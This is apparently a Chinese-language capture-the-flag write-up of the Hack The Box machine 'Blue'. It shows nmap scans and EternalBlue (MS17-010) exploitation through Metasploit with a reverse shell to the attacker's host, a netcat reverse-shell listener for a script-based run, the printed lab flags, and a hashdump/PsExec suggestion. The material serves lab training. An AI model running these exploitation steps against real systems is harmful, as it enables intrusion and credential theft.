Blue Writeup
聲明
我只是個初學者。 Please correct me if I'm wrong.
HTB的第五十一台靶機,與第一台一樣lame。
靶機資訊(Machine Infromation)
Machine | Description |
---|---|
Name | Blue |
OS | Windows |
Difficulty | Easy |
Author | ch4p |
情蒐(Reconnaissance)
服務掃描(Services Scan)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49151/tcp closed unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp closed unknown
49159/tcp closed unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-14T03:00:03+00:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_clock-skew: mean: -25s, deviation: 2s, median: -26s
| smb2-time:
| date: 2024-03-14T03:00:01
|_ start_date: 2024-03-14T02:55:08
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
SMB弱點掃描 - Port 135,139,445
Bash
┌──(xavier㉿kali)-[~/…/htb/blue/recons/nmap]
└─$ sudo nmap -p 135,139,445 --script smb-vul* 10.129.214.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 02:03 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.129.214.101
Host is up (0.33s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
MS-17-010 - EternalBlue
又是一個被打爛的洞。
如果你不知道的話,這個洞是駭客組織Shadow Broker
在2017年將NSA的駭客工具公諸於世後才被發現的,而沒幾個月之後,WannaCry
就來了。切記,政府機關永遠不正義,無所不用其極取得情資,即使傷害整體網路安全。
現在知道為什麼Blue的avatar是穿西裝的男人了吧。
Metasploit1
Bash
┌──(xavier㉿kali)-[~/…/htb/blue/recons/nmap]
└─$ msfconsole
…
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 8787
LPORT => 8787
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.214.101
RHOSTS => 10.129.214.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest haris
The command completed with one or more errors.
C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
type C:\Users\haris\Desktop\user.txt
9ed6837923bd49294822bc3ca357bc05
C:\Windows\system32>type C:\users\Administrator\Desktop\root.txt
type C:\users\Administrator\Desktop\root.txt
fa9332445be6cf80c9b70733de26b9a1
不用Metasploit
由於OSCP不允許使用Metasploit,在此也用GitHub上的腳本打看看,例如d4t4s3c的Win7Blue:
Bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/legacy]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.129.214.101] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>echo %USERDOMAIN%\%USERNAME%
echo %USERDOMAIN%\%USERNAME%
%USERDOMAIN%\SYSTEM
後記
如果想玩一下的話,可以用meterpreter執行hashdump
,然後PsExec。
Last update:
2024-12-23
Created:
2024-03-13